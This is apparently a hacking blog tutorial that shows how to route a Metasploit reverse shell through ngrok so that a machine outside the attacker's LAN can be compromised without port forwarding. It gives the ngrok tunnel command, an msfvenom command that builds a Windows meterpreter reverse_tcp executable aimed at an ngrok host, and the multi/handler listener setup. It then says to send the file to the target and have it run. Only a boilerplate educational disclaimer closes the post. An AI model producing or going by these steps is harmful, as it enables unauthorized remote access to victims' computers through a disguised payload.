Metasploit, packed with most dangerous payloads and exploits is of course a hacker’s must need tool; there is no doubt. It is very easy to scan, create payload, deliver it to the target and there you go.. You got the Shell!!

What if you want to take it outside you network? What if you need to test a remote server or a PC located outside the LAN? How can you exploit a machine using Metasploit without port forwarding?

Metasploit without Port Forwarding | ngrok

ngrok is an amazing service that lets you connect to any device or a service which is located inside LAN or outside LAN) through any network without using port forwarding in the router. You can SSH, use FTP or Local device without Port Forwarding on your local network using ngrok . Click here to learn more about ngrok.

In this post, we will be making use of ngrok to create a metasploit reverse TCP payload and establish a reverse TCP connection from the target machine (Outside LAN) to our attacking machine.

Metasploit outside LAN using ngrok

Step 1 – Set Up Ngrok

First step, set up a free account in ngrok . Follow Step 1, 2 and 3 of the below guide to set one.

Step 2 – Start Ngrok

Once the registration is complete and the auth token is added to your PC, we will start ngrok on a TCP Port; say 9999 where metasploit will be listening for incoming reverse TCP connections.

./ngrok tcp 9999

Setting Up Ngrok for Reverse TCP Connections

If everything goes well, ‘Session Status’ will change to ‘online’ and something like this will be shown next to ‘Forwarding’

Forwarding tcp://0.tcp.ngrok.io:19631 -> localhost:9999

What does that ? Well, This means, all traffic to 0.tcp.ngrok.io through the port 19631 across the internet, will be redirected to port 9999 on the machine where this ngrok session is running. Leave it there.

Step 3 – Create Metasploit Payload using ngrok Hostname and Port

Now we create a payload with the above-mentioned ngrok hostname and port as the payload’s LPORT and LHOST. Use the below command to create one.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19631 -f exe > payload.exe

Here I will be using a windows payload as my target machine outside LAN is windows.

Step 4 – Start Metasploit Listener

The metasploit payload has been created. Now in our machine, we will start the metasploit listener using the below commands.



use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 0.0.0.0 set

LPORT 9999

exploit

When you run ‘exploit’, it will start a listener on the port 9999.

Step 5 – Establishing Reverse TCP Connection using Ngrok

Just send this file to your target machine and run the file by double clicking it.

There you go.. You got the shell…

Disclaimer: This is for educational purposes only. Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

Comments

comments